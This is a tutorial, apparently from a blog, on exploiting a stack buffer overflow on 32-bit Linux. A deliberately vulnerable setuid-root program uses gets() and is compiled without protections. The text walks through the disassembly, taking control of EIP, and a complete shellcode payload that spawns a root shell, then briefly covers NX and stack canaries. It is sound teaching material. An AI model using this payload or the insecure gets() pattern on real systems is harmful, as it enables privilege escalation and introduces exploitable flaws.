A buffer overflow is one of the oldest tricks in the book.  The NSA was performing them in the 70s, and they continue to be a problem today.  As we'll explore here, they result from an interaction between inappropriate assumptions and the way modern operating systems function.  In this tutorial, we'll cover a very simple example of how the execution of a poorly coded program can be subverted to give control over the system it's running on.

 

1. Environment and Code Setup:

Modern program-execution environments and compilation schemes are sophisticated and full of protections that make simple-style exploitation like we'll cover here significantly (not wholly!) more difficult. To establish the basics, we'll modify a few of these parameters. Specifically, we'll disable ASLR (Address Space Layout Randomization), and disable some compilation options. The following is run on 32bit Linux 4.19 w/ GCC 8.3.

First, we'll disable ASLR, then introduce the vulnerable program, and then explore how to compile it in a way that facilitates exploitation.

ASLR, as the name suggests, randomizes where programs are loaded in memory, making it more difficult for an attacker to identify specific regions of interest (like jump targets).
Disable:

$ echo 0 | sudo tee /proc/sys/kernel/randomize_va_space

Next, the vulnerable toy program:

#include <stdio.h>
#include <string.h>
#include <unistd.h>

int vulnFunc() {
    char buf[200];
    printf("buffer addr: %p\n", buf);
    gets(buf);
    return 0;
}

int main() {
    setuid(0);
    vulnFunc();
}

It's very kind of the program to declare the address of its vulnerable buffer!

To compile this, which we've written in bof1.c, we execute the following:

$ gcc -fno-stack-protector -z execstack bof1.c -mpreferred-stack-boundary=2 -g -o bof1

The following flags are used:

  • -fno-stack-protector disables stack smashing protection
  • -z execstack allows data on the stack to be executed
  • -mpreferred-stack-boundary=2 sets stack alignment to 4. By default, this value is 4, which aligns the stack by 16 bytes. This only affects our exploitation in the degree to which it complicates our maths.
  • -g adds debug symbols to the output, which simplifies debugging

Finally, in order to emulate the fun of 'getting root', we'll set the suid bit on the executable, and change its owner to root so that we can take advantage of that setuid call in it bof1!

$ sudo chown root bof1
$ sudo chmod +s bof1

This is perhaps not as unusual as it may seem as many real-world applications take advantage of the same thing to allow users to perform privileged tasks.  Such programs are therefore of particular interest to would-be 'suberverters'!

Now we're ready to go. We've got a non-randomized memory layout, and a vulnerable seuid program owned by root and compiled without protections!

 

2. Debugging bof1:

Time for gdb! To simplify this activity, we'll use the awesome gdb extension, peda (https://github.com/longld/peda). We'll just make use of its elegant output.

To install peda:

$ git clone https://github.com/longld/peda.git ~/peda
$ echo "source ~/peda/peda.py" >> ~/.gdbinit

*Commands in ~/.gdbinit are run by gdb on startup.

A few gdb basics:

  • break <function_name> sets a break point at the given function name (symbol)
  • delete n removes breakpoints by their index
  • next (n) 'step program' steps program by source line, and doesn't enter subroutines
  • step (si) 'steps instruction' steps to the next instruction
  • run (r) runs the program under test
  • continue (c) continues paused execution
  • r < <(shell command) provides program under test w/ output of command on stdin

We'll skip nicely setting up a gdb layout, and how to print memory, registers, stack for brevity in favor of peda's output. There are however, rarely any good reasons not to learn the basics.

Ok! Now we'll load up our program (quelling extraneous output with -q) which we've compiled as bof1:

$ gdb -q bof1

Try running it, breaking on main/vulnFunc, stepping through the vulnFunc call and its return to main! Try providing some input and watching your data in the registers and on the stack:

r < <(python -c 'print "A"*200')

Loading bof1 in gdb

This will fill the buffer declared at the beginning of vulnFunc with A's, which are '41' in hex.

Stepping gdb to vulnFunc

Now we're ready to consider why this is vulnerable, and prepare our exploit!

 

3. Basic Background:

We can check out the the assembly of vulnFunc using either gdb, or:

$ objdump -d bof1 -M intel

We're happily executing, and we reach the point where our vulnerable function is about to be called:

1217:   e8 9d ff ff ff          call   11b9 <vulnFunc>

Upon executing call the following happens (any passed args would have been pushed on stack prior to 'call'). The current instruction pointer (IP) is pushed onto the stack, and execution transfers to our function code. The function begins with its prologue, which sets up its working space, or frame:

11b9:   55                      push   ebp         ; save the previous frame pointer
11ba:   89 e5                   mov    ebp,esp     ; copy the stack pointer to frame pointer
11ac:   53                      push   ebx         ; save ebx (as func intends to use it)

Now our new execution space is ready. Next we make room for local variables:

11bd:  81 ec d4 00 00 00        sub    esp,0xc8    ; subtracts 200 from esp

Because the stack grows down, allocating local storage space is done by subtracting the required size from the stack pointer. At this point, the stack looks like this:

Low Mem/Stack Top						High Mem/Stack Bottom
 [ local storage ][    EBX   ][ saved frame pointer ][ saved IP ][ caller data ]

Now the function does its work, including the vulnerable 'gets' function:

11c3:   e8 f8 fe ff ff          call   10c0 <__x86.get_pc_thunk.bx>
11c8:   81 c3 38 2e 00 00       add    ebx,0x2e38
11ce:   8d 85 34 ff ff ff       lea    eax,[ebp-0xcc]
11d4:   50                      push   eax
11d5:   8d 83 08 e0 ff ff       lea    eax,[ebx-0x1ff8]
11db:   50                      push   eax
11dc:   e8 4f fe ff ff          call   1030 <printf@plt>
11e1:   83 c4 08                add    esp,0x8
11e4:   8d 85 34 ff ff ff       lea    eax,[ebp-0xcc]
11ea:   50                      push   eax
11eb:   e8 50 fe ff ff          call   1040 <gets@plt>
11f0:   83 c4 04                add    esp,0x4
11f3:   b8 00 00 00 00          mov    eax,0x0

Now the function cleans itself up (its epilogue), and prepares to return:

11f8:   8b 5d fc                mov    ebx,DWORD PTR [ebp-0x4]  ; restores ebx using its stack offset
1201:   c9                      leave           ; copies fp into sp, and pops saved fp from stack
1202:   c3                      ret             ; transfers control to addr on top of stack

Obviously, under normal operation this is wholly non-destructive! However, the basic premise for the buffer overflow is here clear. Potentially user-modifiable data is right next to control data! In our contrived case, there is no bounds checking on the input via 'gets' and so we're able to overflow it - that is write to it beyond its allocated size - and overwrite control data, specifically that saved IP, or return address!  Though the naive author of bof1 assumed input wouldn't exceed 200 bytes, they did not explicitly restrict the input, leaving themselves open to a simple overflow!

I can't help but point out here the incredible similarities between the basis for this fundamental potential for vulnerability in most operating systems and our own, personal operating systems. Ever encountered an input that overrode control structures? Ever been stopped dead in your tracks by something awe inspiring? Ever been hit hard enough to knock you back a step and affect your vision? Ever opened your mouth to speak with a beautiful person and had words fail you? We'll return to this later when we consider some of the basic defensive mechanisms already alluded to that modern OSes implement to protect against such subversion.

 

4. Asserting control over EIP:

First, let's try basically overflowing the buffer, and seeing if we can crash the program:

r < <(python -c 'print "A"*256')

Stack clobbered with 0x41


When you see execution trying to jump to '0x41414141' we know we've got a winner.

Since we know what the stack looks like and we can write arbitrary data into our buffer, we simply have to determine how large an overflow we want so that we specifically control the return address. Recalling what we know the stack to look like, we know that our input needs to fill the buffer itself and overwrite the saved (e.g. pushed) EBX value and the frame pointer. The next 4 bytes will then overwrite the return address.

Low Mem/Stack Top							High Mem/Stack Bottom
 [ local storage ][    EBX   ][ saved frame pointer ][ saved IP ][ caller data ]
 [ AAAAAAAAAAAAA ][ deadbeef ][         BBBB        ][   CCCC   ] ...

Even though EBX was only 2 bytes, our stack is aligned to 4, hence needing 4 bytes to fill its space. This yields 200+4+4+4 where the last 4 bytes are the return address, the 'saved IP'!

Test this with the following by breaking on vulnFunc and stepping up until just before the 'ret' instruction is to be executed:

r < <(python -c 'print "A"*200 + "\xde\xad\xbe\xef"[::-1] + "B"*4 + "C"*4')

EIP controlled

Looks good! EBX has been popped off the stack, and we see that it contains 0xdeadbeef, just as the frame pointer, EBP contains 'BBBB', and the stack pointer, ESP, contains 'CCCC'! Now. what ret does is pop the top value off the stack, and jump to it, because if everything had gone correctly, the top of the stack should contain the original caller's next instruction. However now WE control it!

Illustrated here is also the endianness of the processor. Because our Intel processor is a small endian processor, it orders bytes from right to left, and what the [::-1] python array slice does is reverse the order of the array. Hence, in gdb, EBX appears as 0xdeadbeef! The same will hold true for our eventually supplied return address.

Now that we've got control over the return address, we've got a primitive that will allow us to jump to any executable code!  We just need to craft some interesting code for us to jump to!

 

5. The Exploit:

Because our buffer is so large, exists in executable memory, and our vulnerable program so kindly tells us where it's located in memory, the easiest thing to do here is put the code we want to execute in our buffer. We'll replace some of the A's from earlier with our code!

Writing assembly is a little beyond our scope here, and because we're exploiting gets(), a little bit of extra work is required to avoid input-specific issues that gets() creates. More information can be found here (https://www.exploit-db.com/exploits/13357), as well as the shellcode we'll use (which is 55 bytes long):

"\x31\xc0\x31\xdb\xb0\x06\xcd\x80\x53\x68/tty\x68/dev\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"

Armed with this code, we're now ready to prepare our final input. Since we have easily available to us the address of the beginning of our buffer, we'll stick our shellcode right there. Then fill the rest of the space with A's, until we reach 208 bytes (208-55=153), and then place our buffer address at the end! Created with Python, it looks like this:

python -c 'print "\x31\xc0\x31\xdb\xb0\x06\xcd\x80\x53\x68/tty\x68/dev\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80" + "A"*153 + "\xde\xad\xbe\xef"[::-1]'

Now all that's left is to run our vulnerable program once, get the buffer address, replace 0xdeadbeef with the real address, and pipe that into our vulnerable program:

$ python -c 'print "\x31\xc0\x31\xdb\xb0\x06\xcd\x80\x53\x68/tty\x68/dev\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80" + "A"*153 + "\xbf\xff\xf5\x00"[::-1]' | ./bof1

Final exploit in bash

Voila!

 

6. Defenses:

From what we needed to do in order to setup our learning environment and vulnerable program, several defenses are likely clear.  First, we're executing data off the stack, which we explicitly allowed when we compiled the program.  Normally, the stack is allocated in memory marked 'nx' or non-executable.  Secondly, we explicitly turned off stack-smashing protection, that would normally have determined whether critical data on the stack was being overwritten.  What we specifically disabled during compilation was gcc's guard variable protection.  When enabled, this adds code to each function call that pushes a value onto the stack on function entry and that is then checked before function exit.  If the checked value doesn't match the originally set value, the program's execution is halted.

Returning finally to the very human problem of inputs overflowing control structures, what does a protection scheme like gcc's suggest?  We walk around all day being bombarded by inputs, and for the most part - amazingly - our control structures remain fairly intact.  We exhibit an incredible resilience.  On first thought, making working memory non-executable would seem akin to methods for retaining our perspective.  In his Meditations, Marcus Aurelius suggests that should one become so caught up in something as to begin to grow weary of what Lazarus would see as otherworldly luxury, one might benefit from resetting one's perspective.  Live, eat, and drink like a dog; sleep on the ground for a few days and then resume your previous activities.  Commitment to this might lessen your risk for becoming caught up in the immediacy of your experience.

How might you implement guard values?

 

7. References:

 

# Reads: 3376